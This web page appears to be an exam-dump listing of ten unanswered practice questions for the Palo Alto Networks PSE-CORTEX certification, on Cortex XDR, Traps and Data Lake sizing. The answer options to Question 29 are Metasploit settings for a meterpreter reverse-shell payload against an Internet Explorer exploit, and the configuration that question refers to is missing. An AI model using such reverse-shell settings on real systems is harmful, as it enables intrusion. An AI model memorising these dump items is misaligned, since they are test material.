PSE-CORTEX Exam Details

  • Exam Code
    :PSE-CORTEX
  • Exam Name
    :Palo Alto Networks System Engineer Professional - Cortex
  • Certification
    :Palo Alto Networks Certifications
  • Vendor
    :Palo Alto Networks
  • Total Questions
    :182 Q&As
  • Last Updated
    :Jul 15, 2026

Palo Alto Networks PSE-CORTEX Online Questions & Answers

  • Question 21:

    If an anomalous process is discovered while investigating the cause of a security event, you can take immediate action to terminate the process or the whole process tree, and block processes from running by initiating which Cortex XDR capability?

    A. Live Sensors
    B. File Explorer
    C. Log Stitching
    D. Live Terminal

  • Question 22:

    What is the result of creating an exception from an exploit security event?

    A. White lists the process from Wild Fire analysis
    B. exempts the user from generating events for 24 hours
    C. exempts administrators from generating alerts for 24 hours
    D. disables the triggered EPM for the host and process involve

  • Question 23:

    Which deployment type supports installation of an engine on Windows, Mac OS. and Linux?

    A. RPM
    B. SH
    C. DEB
    D. ZIP

  • Question 24:

    What are process exceptions used for?

    A. whitelist programs from WildFire analysis
    B. permit processes to load specific DLLs
    C. change the WildFire verdict for a given executable
    D. disable an EPM for a particular process

  • Question 25:

    Which two filter operators are available in Cortex XDR? (Choose two.)

    A. not Contains
    B. !*
    C. =>
    D. < >

  • Question 26:

    An Administrator is alerted to a Suspicious Process Creation security event from multiple users.

    The users believe that these events are false positives Which two steps should the administrator take to confirm the false positives and create an exception? (Choose two )

    A. With the Malware Security profile, disable the "Prevent Malicious Child Process Execution" module
    B. Within the Malware Security profile add the specific parent process, child process, and command line argument to the child process whitelist
    C. In the Cortex XDR security event, review the specific parent process, child process, and command line arguments
    D. Contact support and ask for a security exception.

  • Question 27:

    An antivirus refresh project was initiated by the IT operations executive. Who is the best source for discussion about the project's operational considerations'?

    A. endpoint manager
    B. SOC manager
    C. SOC analyst
    D. desktop engineer

  • Question 28:

    An administrator has a critical group of systems running Windows XP SP3 that cannot be upgraded The administrator wants to evaluate the ability of Traps to protect these systems and the word processing applications running on them How should an administrator perform this evaluation?

    A. Gather information about the word processing applications and run them on a Windows XP SP3 VM Determine if any of the applications are vulnerable and run the exploit with an exploitation tool
    B. Run word processing exploits in a latest version of Windows VM in a controlled and isolated environment. Document indicators of compromise and compare to Traps protection capabilities
    C. Run a known 2015 flash exploit on a Windows XP SP3 VM. and run an exploitation tool that acts as a listener Use the results to demonstrate Traps capabilities
    D. Prepare the latest version of Windows VM Gather information about the word processing applications, determine if some of them are vulnerable and prepare a working exploit for at least one of them Execute with an exploitation tool

  • Question 29:

    A test for a Microsoft exploit has been planned. After some research Internet Explorer 11 CVE-2016-0189 has been selected and a module in Metasploit has been identified (exploit/windows/browser/ms16_051_vbscript) The description and current configuration of the exploit are as follows;

    What is the remaining configuration?

    A. set PAYLOAD windows/x64/meterpreter/reverse_tcp set SSLCert survey set LHOST 10.0.0.10 set LPORT 8080
    B. set PAYLOAD windows/x64/powershell_bind_tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey
    C. set PAYLOAD windows/x64/meterpreter/reverse_Tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey
    D. set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.10 set LPORT 443 set URIPATH survey

  • Question 30:

    What is the retention requirement for Cortex Data Lake sizing?

    A. number of endpoints
    B. number of VM-Series NGFW
    C. number of days
    D. logs per second

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only Palo Alto Networks exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PSE-CORTEX exam preparations and Palo Alto Networks certification application, do not hesitate to visit our Vcedump.com to find your solutions here.